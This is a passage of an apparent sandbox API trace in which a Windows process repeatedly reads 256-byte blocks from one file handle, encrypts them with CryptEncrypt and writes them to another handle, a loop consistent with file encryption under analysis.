hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.963] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.964] GetLastError () returned 0x0 [0144.964] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.964] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.964] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.964] GetLastError () returned 0x0 [0144.965] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.965] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.965] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.965] GetLastError () returned 0x0 [0144.965] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.965] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.966] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.966] GetLastError () returned 0x0 [0144.966] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.966] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.966] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.966] GetLastError () returned 0x0 [0144.966] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.967] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.967] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.967] GetLastError () returned 0x0 [0144.967] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.968] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.968] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.968] GetLastError () returned 0x0 [0144.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.969] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.969] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.969] GetLastError () returned 0x0 [0144.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.969] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.969] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.969] GetLastError () returned 0x0 [0144.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.969] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.969] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.969] GetLastError () returned 0x0 [0144.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.970] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.970] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.970] GetLastError () returned 0x0 [0144.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.970] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.970] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.970] GetLastError () returned 0x0 [0144.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.970] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.970] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.971] GetLastError () returned 0x0 [0144.971] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.971] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.971] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.971] GetLastError () returned 0x0 [0144.971] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.971] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.971] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.971] GetLastError () returned 0x0 [0144.971] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.972] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.972] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.972] GetLastError () returned 0x0 [0144.972] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.972] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.972] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.972] GetLastError () returned 0x0 [0144.972] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.972] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.972] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.972] GetLastError () returned 0x0 [0144.972] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.972] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.972] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.972] GetLastError () returned 0x0 [0144.972] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.972] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.972] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.972] GetLastError () returned 0x0 [0144.972] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.973] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.973] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.973] GetLastError () returned 0x0 [0144.973] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.973] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.973] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.973] GetLastError () returned 0x0 [0144.973] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.973] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.973] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.973] GetLastError () returned 0x0 [0144.973] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.973] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.973] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.973] GetLastError () returned 0x0 [0144.973] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.973] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.974] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.974] GetLastError () returned 0x0 [0144.974] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.974] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.974] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.974] GetLastError () returned 0x0 [0144.974] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.974] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.974] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.974] GetLastError () returned 0x0 [0144.974] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.974] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.974] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.974] GetLastError () returned 0x0 [0144.974] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.974] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.974] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.974] GetLastError () returned 0x0 [0144.974] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.974] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.975] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.975] GetLastError () returned 0x0 [0144.975] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.975] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.975] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.975] GetLastError () returned 0x0 [0144.975] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.975] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.975] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.975] GetLastError () returned 0x0 [0144.975] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.975] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, 